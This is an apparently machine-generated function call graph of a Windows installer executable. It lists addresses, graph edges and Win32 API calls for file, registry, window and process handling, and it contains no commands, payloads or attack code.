5383->5387 5388 403f5f 5383->5388 5396 403f44 5383->5396 5385->5381 5386->5387 5386->5396 5387->5392 5390 403f67 5388->5390 5391 403f7c 5388->5391 5389 40431e SendMessageW 5389->5392 5393 40140b 2 API calls 5390->5393 5394 40140b 2 API calls 5391->5394 5392->5379 5393->5396 5394->5396 5395->5381 5396->5389 5396->5392 5398 4040f7 GetDlgItem 5397->5398 5399 404114 ShowWindow EnableWindow 5398->5399 5400 40410c 5398->5400 5423 404367 EnableWindow 5399->5423 5400->5399 5402 40413e EnableWindow 5407 404152 5402->5407 5403 404157 GetSystemMenu EnableMenuItem SendMessageW 5404 404187 SendMessageW 5403->5404 5403->5407 5404->5407 5406 403e4d 18 API calls 5406->5407 5407->5403 5407->5406 5424 40437a SendMessageW 5407->5424 5425 4063b0 lstrcpynW 5407->5425 5409 4041b6 lstrlenW 5410 4063d2 17 API calls 5409->5410 5411 4041cc SetWindowTextW 5410->5411 5412 401389 2 API calls 5411->5412 5412->5381 5414 40422a CreateDialogParamW 5413->5414 5413->5422 5415 40425d 5414->5415 5414->5422 5416 404345 18 API calls 5415->5416 5417 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5416->5417 5418 401389 2 API calls 5417->5418 5419 4042ae 5418->5419 5419->5384 5420 4042b6 ShowWindow 5419->5420 5421 404391 SendMessageW 5420->5421 5421->5422 5422->5380 5422->5384 5423->5402 5424->5407 5425->5409 5426 401ced 5427 402c15 17 API calls 5426->5427 5428 401cf3 IsWindow 5427->5428 5429 401a20 5428->5429 4962 40176f 4963 402c37 17 API calls 4962->4963 4964 401776 4963->4964 4965 401796 4964->4965 4966 40179e 4964->4966 5002 4063b0 lstrcpynW 4965->5002 5003 4063b0 lstrcpynW 4966->5003 4969 40179c 4973 406644 5 API calls 4969->4973 4970 4017a9 4971 405c81 3 API calls 4970->4971 4972 4017af lstrcatW 4971->4972 4972->4969 4978 4017bb 4973->4978 4974 4066f3 2 API calls 4974->4978 4975 4017f7 4976 405e7d 2 API calls 4975->4976 4976->4978 4978->4974 4978->4975 4979 4017cd CompareFileTime 4978->4979 4980 40188d 4978->4980 4987 4063d2 17 API calls 4978->4987 4992 4063b0 lstrcpynW 4978->4992 4997 
405a12 MessageBoxIndirectW 4978->4997 4998 401864 4978->4998 5001 405ea2 GetFileAttributesW CreateFileW 4978->5001 4979->4978 4981 405414 24 API calls 4980->4981 4983 401897 4981->4983 4982 405414 24 API calls 5000 401879 4982->5000 4984 4031ba 44 API calls 4983->4984 4985 4018aa 4984->4985 4986 4018be SetFileTime 4985->4986 4988 4018d0 CloseHandle 4985->4988 4986->4988 4987->4978 4989 4018e1 4988->4989 4988->5000 4990 4018e6 4989->4990 4991 4018f9 4989->4991 4993 4063d2 17 API calls 4990->4993 4994 4063d2 17 API calls 4991->4994 4992->4978 4995 4018ee lstrcatW 4993->4995 4996 401901 4994->4996 4995->4996 4999 405a12 MessageBoxIndirectW 4996->4999 4997->4978 4998->4982 4998->5000 4999->5000 5001->4978 5002->4969 5003->4970 5437 402570 5438 402c37 17 API calls 5437->5438 5439 402577 5438->5439 5442 405ea2 GetFileAttributesW CreateFileW 5439->5442 5441 402583 5442->5441 5004 401b71 5005 401bc2 5004->5005 5006 401b7e 5004->5006 5008 401bc7 5005->5008 5009 401bec GlobalAlloc 5005->5009 5007 401c07 5006->5007 5012 401b95 5006->5012 5010 4063d2 17 API calls 5007->5010 5022 4022f1 5007->5022 5008->5022 5025 4063b0 lstrcpynW 5008->5025 5011 4063d2 17 API calls 5009->5011 5014 4022eb 5010->5014 5011->5007 5023 4063b0 lstrcpynW 5012->5023 5018 405a12 MessageBoxIndirectW 5014->5018 5016 401bd9 GlobalFree 5016->5022 5017 401ba4 5024 4063b0 lstrcpynW 5017->5024 5018->5022 5020 401bb3 5026 4063b0 lstrcpynW 5020->5026 5023->5017 5024->5020 5025->5016 5026->5022 5027 4024f2 5028 402c77 17 API calls 5027->5028 5029 4024fc 5028->5029 5030 402c15 17 API calls 5029->5030 5031 402505 5030->5031 5032 402521 RegEnumKeyW 5031->5032 5033 40252d RegEnumValueW 5031->5033 5036 402885 5031->5036 5034 402549 RegCloseKey 5032->5034 5033->5034 5035 402542 5033->5035 5034->5036 5035->5034 5450 401a72 5451 402c15 17 API calls 5450->5451 5452 401a78 5451->5452 5453 402c15 17 API calls 5452->5453 5454 401a20 5453->5454 5455 401573 5456 401583 ShowWindow 5455->5456 5457 40158c 5455->5457 5456->5457 
5458 40159a ShowWindow 5457->5458 5459 402abf 5457->5459 5458->5459 5460 4014f5 SetForegroundWindow 5461 402abf 5460->5461 5462 100016b6 5463 100016e5 5462->5463 5464 10001b18 22 API calls 5463->5464 5465 100016ec 5464->5465 5466 100016f3 5465->5466 5467 100016ff 5465->5467 5468 10001272 2 API calls 5466->5468 5469 10001726 5467->5469 5470 10001709 5467->5470 5478 100016fd 5468->5478 5472 10001750 5469->5472 5473 1000172c 5469->5473 5471 1000153d 3 API calls 5470->5471 5475 1000170e 5471->5475 5474 1000153d 3 API calls 5472->5474 5476 100015b4 3 API calls 5473->5476 5474->5478 5479 100015b4 3 API calls 5475->5479 5477 10001731 5476->5477 5480 10001272 2 API calls 5477->5480 5481 10001714 5479->5481 5482 10001737 GlobalFree 5480->5482 5483 10001272 2 API calls 5481->5483 5482->5478 5484 1000174b GlobalFree 5482->5484 5485 1000171a GlobalFree 5483->5485 5484->5478 5485->5478 5486 401e77 5487 402c37 17 API calls 5486->5487 5488 401e7d 5487->5488 5489 402c37 17 API calls 5488->5489 5490 401e86 5489->5490 5491 402c37 17 API calls 5490->5491 5492 401e8f 5491->5492 5493 402c37 17 API calls 5492->5493 5494 401e98 5493->5494 5495 401423 24 API calls 5494->5495 5496 401e9f 5495->5496 5503 4059d8 ShellExecuteExW 5496->5503 5498 401ee1 5499 40683b 5 API calls 5498->5499 5501 402885 5498->5501 5500 401efb CloseHandle 5499->5500 5500->5501 5503->5498 5504 406e77 5508 40693e 5504->5508 5505 4072a9 5506 4069c8 GlobalAlloc 5506->5505 5506->5508 5507 4069bf GlobalFree 5507->5506 5508->5505 5508->5506 5508->5507 5508->5508 5509 406a36 GlobalFree 5508->5509 5510 406a3f GlobalAlloc 5508->5510 5509->5510 5510->5505 5510->5508 5511 10002238 5512 10002296 5511->5512 5513 100022cc 5511->5513 5512->5513 5514 100022a8 GlobalAlloc 5512->5514 5514->5512 5515 40167b 5516 402c37 17 API calls 5515->5516 5517 401682 5516->5517 5518 402c37 17 API calls 5517->5518 5519 40168b 5518->5519 5520 402c37 17 API calls 5519->5520 5521 401694 MoveFileW 5520->5521 5522 4016a7 5521->5522 5528 4016a0 5521->5528 
5523 40224a 5522->5523 5524 4066f3 2 API calls 5522->5524 5526 4016b6 5524->5526 5525 401423 24 API calls 5525->5523 5526->5523 5527 406176 36 API calls 5526->5527 5527->5528 5528->5525 5529 403a7c 5530 403a87 5529->5530 5531 403a8b 5530->5531 5532 403a8e GlobalAlloc 5530->5532 5532->5531 5533 1000103d 5534 1000101b 5 API calls 5533->5534 5535 10001056 5534->5535 5049 40247e 5050 402c77 17 API calls 5049->5050 5051 402488 5050->5051 5052 402c37 17 API calls 5051->5052 5053 402491 5052->5053 5054 40249c RegQueryValueExW 5053->5054 5058 402885 5053->5058 5055 4024c2 RegCloseKey 5054->5055 5056 4024bc 5054->5056 5055->5058 5056->5055 5060 4062f7 wsprintfW 5056->5060 5060->5055 5536 4020fe 5537 402c37 17 API calls 5536->5537 5538 402105 5537->5538 5539 402c37 17 API calls 5538->5539 5540 40210f 5539->5540 5541 402c37 17 API calls 5540->5541 5542 402119 5541->5542 5543 402c37 17 API calls 5542->5543 5544 402123 5543->5544 5545 402c37 17 API calls 5544->5545 5546 40212d 5545->5546 5547 40216c CoCreateInstance 5546->5547 5548 402c37 17 API calls 5546->5548 5551 40218b 5547->5551 5548->5547 5549 401423 24 API calls 5550 40224a 5549->5550 5551->5549 5551->5550 5552 4019ff 5553 402c37 17 API calls 5552->5553 5554 401a06 5553->5554 5555 402c37 17 API calls 5554->5555 5556 401a0f 5555->5556 5557 401a16 lstrcmpiW 5556->5557 5558 401a28 lstrcmpW 5556->5558 5559 401a1c 5557->5559 5558->5559 4111 401f00 4126 402c37 4111->4126 4120 401f2b 4122 401f30 4120->4122 4123 401f3b 4120->4123 4121 402885 4151 4062f7 wsprintfW 4122->4151 4125 401f39 CloseHandle 4123->4125 4125->4121 4127 402c43 4126->4127 4152 4063d2 4127->4152 4130 401f06 4132 405414 4130->4132 4133 40542f 4132->4133 4141 401f10 4132->4141 4134 40544b lstrlenW 4133->4134 4135 4063d2 17 API calls 4133->4135 4136 405474 4134->4136 4137 405459 lstrlenW 4134->4137 4135->4134 4139 405487 4136->4139 4140 40547a SetWindowTextW 4136->4140 4138 40546b lstrcatW 4137->4138 4137->4141 4138->4136 4139->4141 4142 40548d SendMessageW 
SendMessageW SendMessageW 4139->4142 4140->4139 4143 405995 CreateProcessW 4141->4143 4142->4141 4144 401f16 4143->4144 4145 4059c8 CloseHandle 4143->4145 4144->4121 4144->4125 4146 40683b WaitForSingleObject 4144->4146 4145->4144 4147 406855 4146->4147 4148 406867 GetExitCodeProcess 4147->4148 4194 4067c6 4147->4194 4148->4120 4151->4125 4153 4063df 4152->4153 4154 40662a 4153->4154 4157 4065f8 lstrlenW 4153->4157 4158 4063d2 10 API calls 4153->4158 4161 40650d GetSystemDirectoryW 4153->4161 4163 406520 GetWindowsDirectoryW 4153->4163 4164 406644 5 API calls 4153->4164 4165 4063d2 10 API calls 4153->4165 4166 40659b lstrcatW 4153->4166 4167 406554 SHGetSpecialFolderLocation 4153->4167 4178 40627e 4153->4178 4183 4062f7 wsprintfW 4153->4183 4184 4063b0 lstrcpynW 4153->4184 4155 402c64 4154->4155 4185 4063b0 lstrcpynW 4154->4185 4155->4130 4169 406644 4155->4169 4157->4153 4158->4157 4161->4153 4163->4153 4164->4153 4165->4153 4166->4153 4167->4153 4168 40656c SHGetPathFromIDListW CoTaskMemFree 4167->4168 4168->4153 4175 406651 4169->4175 4170 4066c7 4171 4066cc CharPrevW 4170->4171 4173 4066ed 4170->4173 4171->4170 4172 4066ba CharNextW 4172->4170 4172->4175 4173->4130 4175->4170 4175->4172 4176 4066a6 CharNextW 4175->4176 4177 4066b5 CharNextW 4175->4177 4190 405cae 4175->4190 4176->4175 4177->4172 4186 40621d 4178->4186 4181 4062b2 RegQueryValueExW RegCloseKey 4182 4062e2 4181->4182 4182->4153 4183->4153 4184->4153 4185->4155 4187 40622c 4186->4187 4188 406230 4187->4188 4189 406235 RegOpenKeyExW 4187->4189 4188->4181 4188->4182 4189->4188 4191 405cb4 4190->4191 4192 405cca 4191->4192 4193 405cbb CharNextW 4191->4193 4192->4175 4193->4191 4195 4067e3 PeekMessageW 4194->4195 4196 4067f3 WaitForSingleObject 4195->4196 4197 4067d9 DispatchMessageW 4195->4197 4196->4147 4197->4195 5560 401000 5561 401037 BeginPaint GetClientRect 5560->5561 5562 40100c DefWindowProcW 5560->5562 5564 4010f3 5561->5564 5565 401179 5562->5565 5566 401073 CreateBrushIndirect FillRect 
DeleteObject 5564->5566 5567 4010fc 5564->5567 5566->5564 5568 401102 CreateFontIndirectW 5567->5568 5569 401167 EndPaint 5567->5569 5568->5569 5570 401112 6 API calls 5568->5570 5569->5565 5570->5569 4372 100027c2 4373 10002812 4372->4373 4374 100027d2 VirtualProtect 4372->4374 4374->4373 5571 401503 5572 40150b 5571->5572 5574 40151e 5571->5574 5573 402c15 17 API calls 5572->5573 5573->5574 4414 402306 4415 40230e 4414->4415 4418 402314 4414->4418 4416 402c37 17 API calls 4415->4416 4416->4418 4417 402322 4420 402c37 17 API calls 4417->4420 4422 402330 4417->4422 4418->4417 4419 402c37 17 API calls 4418->4419 4419->4417 4420->4422 4421 402c37 17 API calls 4423 402339 WritePrivateProfileStringW 4421->4423 4422->4421 5582 401f86 5583 402c37 17 API calls 5582->5583 5584 401f8d 5583->5584 5585 40678a 5 API calls 5584->5585 5586 401f9c 5585->5586 5587 401fb8 GlobalAlloc 5586->5587 5588 402020 5586->5588 5587->5588 5589 401fcc 5587->5589 5590 40678a 5 API calls 5589->5590 5591 401fd3 5590->5591 5592 40678a 5 API calls 5591->5592 5593 401fdd 5592->5593 5593->5588 5597 4062f7 wsprintfW 5593->5597 5595 402012 5598 4062f7 wsprintfW 5595->5598 5597->5595 5598->5588 4424 402388 4425 402390 4424->4425 4426 4023bb 4424->4426 4440 402c77 4425->4440 4428 402c37 17 API calls 4426->4428 4430 4023c2 4428->4430 4436 402cf5 4430->4436 4431 4023a1 4433 402c37 17 API calls 4431->4433 4435 4023a8 RegDeleteValueW RegCloseKey 4433->4435 4434 4023cf 4435->4434 4437 402d0b 4436->4437 4438 402d21 4437->4438 4445 402d2a 4437->4445 4438->4434 4441 402c37 17 API calls 4440->4441 4442 402c8e 4441->4442 4443 40621d RegOpenKeyExW 4442->4443 4444 402397 4443->4444 4444->4431 4444->4434 4446 40621d RegOpenKeyExW 4445->4446 4447 402d58 4446->4447 4448 402dd0 4447->4448 4453 402d5c 4447->4453 4448->4438 4449 402d7e RegEnumKeyW 4450 402d95 RegCloseKey 4449->4450 4449->4453 4451 40678a 5 API calls 4450->4451 4454 402da5 4451->4454 4452 402db6 RegCloseKey 4452->4448 4453->4449 4453->4450 4453->4452 4455 
402d2a 6 API calls 4453->4455 4456 402dc4 RegDeleteKeyW 4454->4456 4457 402da9 4454->4457 4455->4453 4456->4448 4457->4448 5599 405388 5600 405398 5599->5600 5601 4053ac 5599->5601 5602 4053f5 5600->5602 5603 40539e 5600->5603 5604 4053b4 IsWindowVisible 5601->5604 5610 4053cb 5601->5610 5605 4053fa CallWindowProcW 5602->5605 5606 404391 SendMessageW 5603->5606 5604->5602 5607 4053c1 5604->5607 5608 4053a8 5605->5608 5606->5608 5612 404cde SendMessageW 5607->5612 5610->5605 5617 404d5e 5610->5617 5613 404d01 GetMessagePos ScreenToClient SendMessageW 5612->5613 5614 404d3d SendMessageW 5612->5614 5615 404d35 5613->5615 5616 404d3a 5613->5616 5614->5615 5615->5610 5616->5614 5626 4063b0 lstrcpynW 5617->5626 5619 404d71 5627 4062f7 wsprintfW 5619->5627 5621 404d7b 5622 40140b 2 API calls 5621->5622 5623 404d84 5622->5623 5628 4063b0 lstrcpynW 5623->5628 5625 404d8b 5625->5602 5626->5619 5627->5621 5628->5625 4467 403489 SetErrorMode GetVersion 4468 4034c8 4467->4468 4469 4034ce 4467->4469 4470 40678a 5 API calls 4468->4470 4471 40671a 3 API calls 4469->4471 4470->4469 4472 4034e4 lstrlenA 4471->4472 4472->4469 4473 4034f4 4472->4473 4474 40678a 5 API calls 4473->4474 4475 4034fb 4474->4475 4476 40678a 5 API calls 4475->4476 4477 403502 4476->4477 4478 40678a 5 API calls 4477->4478 4479 40350e #17 OleInitialize SHGetFileInfoW 4478->4479 4558 4063b0 lstrcpynW 4479->4558 4482 40355a GetCommandLineW 4559 4063b0 lstrcpynW 4482->4559 4484 40356c GetModuleHandleW 4485 403584 4484->4485 4486 405cae CharNextW 4485->4486 4487 403593 CharNextW 4486->4487 4488 4036bd GetTempPathW 4487->4488 4498 4035ac 4487->4498 4560 403458 4488->4560 4490 4036d5 4491 4036d9 GetWindowsDirectoryW lstrcatW 4490->4491 4492 40372f DeleteFileW 4490->4492 4493 403458 12 API calls 4491->4493 4570 402f14 GetTickCount GetModuleFileNameW 4492->4570 4496 4036f5 4493->4496 4494 405cae CharNextW 4494->4498 4496->4492 4499 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4496->4499 
4497 403743 4504 4037e6 4497->4504 4508 405cae CharNextW 4497->4508 4553 4037f6 4497->4553 4498->4494 4501 4036a8 4498->4501 4503 4036a6 4498->4503 4502 403458 12 API calls 4499->4502 4657 4063b0 lstrcpynW 4501->4657 4506 403727 4502->4506 4503->4488 4600 403abe 4504->4600 4506->4492 4506->4553 4521 403762 4508->4521 4510 403930 4513 4039b4 ExitProcess 4510->4513 4514 403938 GetCurrentProcess OpenProcessToken 4510->4514 4511 403810 4669 405a12 4511->4669 4519 403950 LookupPrivilegeValueW AdjustTokenPrivileges 4514->4519 4520 403984 4514->4520 4516 4037c0 4522 405d89 18 API calls 4516->4522 4517 403826 4523 40597d 5 API calls 4517->4523 4519->4520 4524 40678a 5 API calls 4520->4524 4521->4516 4521->4517 4525 4037cc 4522->4525 4526 40382b lstrcatW 4523->4526 4527 40398b 4524->4527 4525->4553 4658 4063b0 lstrcpynW 4525->4658 4528 403847 lstrcatW lstrcmpiW 4526->4528 4529 40383c lstrcatW 4526->4529 4530 4039a0 ExitWindowsEx 4527->4530 4531 4039ad 4527->4531 4533 403863 4528->4533 4528->4553 4529->4528 4530->4513 4530->4531 4675 40140b 4531->4675 4536 403868 4533->4536 4537 40386f 4533->4537 4535 4037db 4659 4063b0 lstrcpynW 4535->4659 4540 4058e3 4 API calls 4536->4540 4538 405960 2 API calls 4537->4538 4541 403874 SetCurrentDirectoryW 4538->4541 4542 40386d 4540->4542 4543 403884 4541->4543 4544 40388f 4541->4544 4542->4541 4673 4063b0 lstrcpynW 4543->4673 4674 4063b0 lstrcpynW 4544->4674 4547 4063d2 17 API calls 4548 4038ce DeleteFileW 4547->4548 4549 4038db CopyFileW 4548->4549 4554 40389d 4548->4554 4549->4554 4550 403924 4551 406176 36 API calls 4550->4551 4551->4553 4552 406176 36 API calls 4552->4554 4660 4039cc 4553->4660 4554->4547 4554->4550 4554->4552 4555 4063d2 17 API calls 4554->4555 4556 405995 2 API calls 4554->4556 4557 40390f CloseHandle 4554->4557 4555->4554 4556->4554 4557->4554 4558->4482 4559->4484 4561 406644 5 API calls 4560->4561 4562 403464 4561->4562 4563 40346e 4562->4563 4564 405c81 3 API calls 4562->4564 4563->4490 4565 403476 4564->4565 
4566 405960 2 API calls 4565->4566 4567 40347c 4566->4567 4678 405ed1 4567->4678 4682 405ea2 GetFileAttributesW CreateFileW 4570->4682 4572 402f57 4599 402f64 4572->4599 4683 4063b0 lstrcpynW 4572->4683 4574 402f7a 4575 405ccd 2 API calls 4574->4575 4576 402f80 4575->4576 4684 4063b0 lstrcpynW 4576->4684 4578 402f8b GetFileSize 4579 40308c 4578->4579 4597 402fa2 4578->4597 4685 402e72 4579->4685 4583 403127 4586 402e72 32 API calls 4583->4586 4584 4030cf GlobalAlloc 4585 4030e6 4584->4585 4590 405ed1 2 API calls 4585->4590 4586->4599 4588 4030b0 4591 40342b ReadFile 4588->4591 4589 402e72 32 API calls 4589->4597 4593 4030f7 CreateFileW 4590->4593 4592 4030bb 4591->4592 4592->4584 4592->4599 4594 403131 4593->4594 4593->4599 4700 403441 SetFilePointer 4594->4700 4596 40313f 4701 4031ba 4596->4701 4597->4579 4597->4583 4597->4589 4597->4599 4716 40342b 4597->4716 4599->4497 4601 40678a 5 API calls 4600->4601 4602 403ad2 4601->4602 4603 403ad8 4602->4603 4604 403aea 4602->4604 4752 4062f7 wsprintfW 4603->4752 4605 40627e 3 API calls 4604->4605 4606 403b1a 4605->4606 4607 403b39 lstrcatW 4606->4607 4609 40627e 3 API calls 4606->4609 4610 403ae8 4607->4610 4609->4607 4744 403d94 4610->4744 4613 405d89 18 API calls 4614 403b6b 4613->4614 4615 403bff 4614->4615 4617 40627e 3 API calls 4614->4617 4616 405d89 18 API calls 4615->4616 4618 403c05 4616->4618 4620 403b9d 4617->4620 4619 403c15 LoadImageW 4618->4619 4621 4063d2 17 API calls 4618->4621 4622 403cbb 4619->4622 4623 403c3c RegisterClassW 4619->4623 4620->4615 4624 403bbe lstrlenW 4620->4624 4627 405cae CharNextW 4620->4627 4621->4619 4626 40140b 2 API calls 4622->4626 4625 403c72 SystemParametersInfoW CreateWindowExW 4623->4625 4656 403cc5 4623->4656 4628 403bf2 4624->4628 4629 403bcc lstrcmpiW 4624->4629 4625->4622 4630 403cc1 4626->4630 4631 403bbb 4627->4631 4633 405c81 3 API calls 4628->4633 4629->4628 4632 403bdc GetFileAttributesW 4629->4632 4635 403d94 18 API calls 4630->4635 4630->4656 4631->4624 4634 403be8 
4632->4634 4636 403bf8 4633->4636 4634->4628 4637 405ccd 2 API calls 4634->4637 4638 403cd2 4635->4638 4753 4063b0 lstrcpynW 4636->4753 4637->4628 4640 403d61 4638->4640 4641 403cde ShowWindow 4638->4641 4754 4054e7 OleInitialize 4640->4754 4643 40671a 3 API calls 4641->4643 4645 403cf6 4643->4645 4644 403d67 4646 403d83 4644->4646 4647 403d6b 4644->4647 4648 403d04 GetClassInfoW 4645->4648 4650 40671a 3 API calls 4645->4650 4649 40140b 2 API calls 4646->4649 4654 40140b 2 API calls 4647->4654 4647->4656 4651 403d18 GetClassInfoW RegisterClassW 4648->4651 4652 403d2e DialogBoxParamW 4648->4652 4649->4656 4650->4648 4651->4652 4653 40140b 2 API calls 4652->4653 4655 403d56 4653->4655 4654->4656 4655->4656 4656->4553 4657->4503 4658->4535 4659->4504 4661 4039e7 4660->4661 4662 4039dd CloseHandle 4660->4662 4663 4039f1 CloseHandle 4661->4663 4664 4039fb 4661->4664 4662->4661 4663->4664 4772 403a29 4664->4772 4667 405abe 67 API calls 4668 4037ff OleUninitialize 4667->4668 4668->4510 4668->4511 4670 405a27 4669->4670 4671 40381e ExitProcess 4670->4671 4672 405a3b MessageBoxIndirectW 4670->4672 4672->4671 4673->4544 4674->4554 4676 401389 2 API calls 4675->4676 4677 401420 4676->4677 4677->4513 4679 405ede GetTickCount GetTempFileNameW 4678->4679 4680 405f14 4679->4680 4681 403487 4679->4681 4680->4679 4680->4681 4681->4490 4682->4572 4683->4574 4684->4578 4686 402e83 4685->4686 4687 402e9b 4685->4687 4688 402e93 4686->4688 4689 402e8c DestroyWindow 4686->4689 4690 402ea3 4687->4690 4691 402eab GetTickCount 4687->4691 4688->4584 4688->4599 4719 403441 SetFilePointer 4688->4719 4689->4688 4693 4067c6 2 API calls 4690->4693 4691->4688 4692 402eb9 4691->4692 4694 402ec1 4692->4694 4695 402eee CreateDialogParamW ShowWindow 4692->4695 4693->4688 4694->4688 4720 402e56 4694->4720 4695->4688 4697 402ecf wsprintfW 4698 405414 24 API calls 4697->4698 4699 402eec 4698->4699 4699->4688 4700->4596 4702 4031e5 4701->4702 4703 4031c9 SetFilePointer 4701->4703 4723 4032c2 GetTickCount 
4702->4723 4703->4702 4706 405f25 ReadFile 4707 403205 4706->4707 4708 4032c2 42 API calls 4707->4708 4715 403282 4707->4715 4709 40321c 4708->4709 4710 403288 ReadFile 4709->4710 4713 40322b 4709->4713 4709->4715 4710->4715 4712 405f25 ReadFile 4712->4713 4713->4712 4714 405f54 WriteFile 4713->4714 4713->4715 4714->4713 4715->4599 4717 405f25 ReadFile 4716->4717 4718 40343e 4717->4718 4718->4597 4719->4588 4721 402e65 4720->4721 4722 402e67 MulDiv 4720->4722 4721->4722 4722->4697 4724 4032f0 4723->4724 4725 40341a 4723->4725 4736 403441 SetFilePointer 4724->4736 4726 402e72 32 API calls 4725->4726 4732 4031ec 4726->4732 4728 4032fb SetFilePointer 4734 403320 4728->4734 4729 40342b ReadFile 4729->4734 4731 402e72 32 API calls 4731->4734 4732->4706 4732->4715 4733 405f54 WriteFile 4733->4734 4734->4729 4734->4731 4734->4732 4734->4733 4735 4033fb SetFilePointer 4734->4735 4737 40690b 4734->4737 4735->4725 4736->4728 4738 406930 4737->4738 4741 406938 4737->4741 4738->4734 4739 4069c8 GlobalAlloc 4739->4738 4739->4741 4740 4069bf GlobalFree 4740->4739 4741->4738 4741->4739 4741->4740 4742 406a36 GlobalFree 4741->4742 4743 406a3f GlobalAlloc 4741->4743 4742->4743 4743->4738 4743->4741 4745 403da8 4744->4745 4761 4062f7 wsprintfW 4745->4761 4747 403e19 4762 403e4d 4747->4762 4749 403b49 4749->4613 4750 403e1e 4750->4749 4751 4063d2 17 API calls 4750->4751 4751->4750 4752->4610 4753->4615 4765 404391 4754->4765 4756 40550a 4760 405531 4756->4760 4768 401389 4756->4768 4757 404391 SendMessageW 4758 405543 OleUninitialize 4757->4758 4758->4644 4760->4757 4761->4747 4763 4063d2 17 API calls 4762->4763 4764 403e5b SetWindowTextW 4763->4764 4764->4750 4766 4043a9 4765->4766 4767 40439a SendMessageW 4765->4767 4766->4756 4767->4766 4770 401390 4768->4770 4769 4013fe 4769->4756 4770->4769 4771 4013cb MulDiv SendMessageW 4770->4771 4771->4770 4773 403a37 4772->4773 4774 403a00 4773->4774 4775 403a3c FreeLibrary GlobalFree 4773->4775 4774->4667 4775->4774 4775->4775 4776 401389 
4778 401390 4776->4778 4777 4013fe 4778->4777 4779 4013cb MulDiv SendMessageW 4778->4779 4779->4778 5629 40190c 5630 401943 5629->5630 5631 402c37 17 API calls 5630->5631 5632 401948 5631->5632 5633 405abe 67 API calls 5632->5633 5634 401951 5633->5634 5635 401d0e 5636 402c15 17 API calls 5635->5636 5637 401d15 5636->5637 5638 402c15 17 API calls 5637->5638 5639 401d21 GetDlgItem 5638->5639 5640 40258c 5639->5640 5641 1000164f 5642 10001516 GlobalFree 5641->5642 5644 10001667 5642->5644 5643 100016ad GlobalFree 5644->5643 5645 10001682 5644->5645 5646 10001699 VirtualFree 5644->5646 5645->5643 5646->5643 5647 40190f 5648 402c37 17 API calls 5647->5648 5649 401916 5648->5649 5650 405a12 MessageBoxIndirectW 5649->5650 5651 40191f 5650->5651 5652 404d90 GetDlgItem GetDlgItem 5653 404de2 7 API calls 5652->5653 5661 404ffb 5652->5661 5654 404e85 DeleteObject 5653->5654 5655 404e78 SendMessageW 5653->5655 5656 404e8e 5654->5656 5655->5654 5658 404ec5 5656->5658 5660 4063d2 17 API calls 5656->5660 5657 4050df 5659 40518b 5657->5659 5668 405138 SendMessageW 5657->5668 5695 404fee 5657->5695 5662 404345 18 API calls 5658->5662 5664 405195 SendMessageW 5659->5664 5665 40519d 5659->5665 5666 404ea7 SendMessageW SendMessageW 5660->5666 5661->5657 5663 40506c 5661->5663 5671 404cde 5 API calls 5661->5671 5667 404ed9 5662->5667 5663->5657 5670 4050d1 SendMessageW 5663->5670 5664->5665 5676 4051b6 5665->5676 5677 4051af ImageList_Destroy 5665->5677 5688 4051c6 5665->5688 5666->5656 5672 404345 18 API calls 5667->5672 5674 40514d SendMessageW 5668->5674 5668->5695 5669 4043ac 8 API calls 5675 405381 5669->5675 5670->5657 5671->5663 5683 404ee7 5672->5683 5673 405335 5681 405347 ShowWindow GetDlgItem ShowWindow 5673->5681 5673->5695 5679 405160 5674->5679 5680 4051bf GlobalFree 5676->5680 5676->5688 5677->5676 5678 404fbc GetWindowLongW SetWindowLongW 5682 404fd5 5678->5682 5689 405171 SendMessageW 5679->5689 5680->5688 5681->5695 5684 404ff3 5682->5684 5685 404fdb ShowWindow 
5682->5685 5683->5678 5687 404f37 SendMessageW 5683->5687 5690 404fb6 5683->5690 5692 404f73 SendMessageW 5683->5692 5693 404f84 SendMessageW 5683->5693 5704 40437a SendMessageW 5684->5704 5703 40437a SendMessageW 5685->5703 5687->5683 5688->5673 5694 404d5e 4 API calls 5688->5694 5699 405201 5688->5699 5689->5659 5690->5678 5690->5682 5692->5683 5693->5683 5694->5699 5695->5669 5696 40530b InvalidateRect 5696->5673 5697 405321 5696->5697 5705 404c99 5697->5705 5698 40522f SendMessageW 5702 405245 5698->5702 5699->5698 5699->5702 5701 4052b9 SendMessageW SendMessageW 5701->5702 5702->5696 5702->5701 5703->5695 5704->5661 5708 404bd0 5705->5708 5707 404cae 5707->5673 5709 404be9 5708->5709 5710 4063d2 17 API calls 5709->5710 5711 404c4d 5710->5711 5712 4063d2 17 API calls 5711->5712 5713 404c58 5712->5713 5714 4063d2 17 API calls 5713->5714 5715 404c6e lstrlenW wsprintfW SetDlgItemTextW 5714->5715 5715->5707 5716 401491 5717 405414 24 API calls 5716->5717 5718 401498 5717->5718 5719 402592 5720 4025c1 5719->5720 5721 4025a6 5719->5721 5723 4025f5 5720->5723 5724 4025c6 5720->5724 5722 402c15 17 API calls 5721->5722 5729 4025ad 5722->5729 5726 402c37 17 API calls 5723->5726 5725 402c37 17 API calls 5724->5725 5727 4025cd WideCharToMultiByte lstrlenA 5725->5727 5728 4025fc lstrlenW 5726->5728 5727->5729 5728->5729 5731 405f83 5 API calls 5729->5731 5732 40263f 5729->5732 5733 402629 5729->5733 5730 405f54 WriteFile 5730->5732 5731->5733 5733->5730 5733->5732 5734 404493 lstrlenW 5735 4044b2 5734->5735 5736 4044b4 WideCharToMultiByte 5734->5736 5735->5736 5737 404814 5738 404840 5737->5738 5739 404851 5737->5739 5798 4059f6 GetDlgItemTextW 5738->5798 5741 40485d GetDlgItem 5739->5741 5746 4048bc 5739->5746 5743 404871 5741->5743 5742 40484b 5745 406644 5 API calls 5742->5745 5749 404885 SetWindowTextW 5743->5749 5754 405d2c 4 API calls 5743->5754 5744 4049a0 5747 404b4f 5744->5747 5800 4059f6 GetDlgItemTextW 5744->5800 5745->5739 5746->5744 5746->5747 5751 4063d2 17 
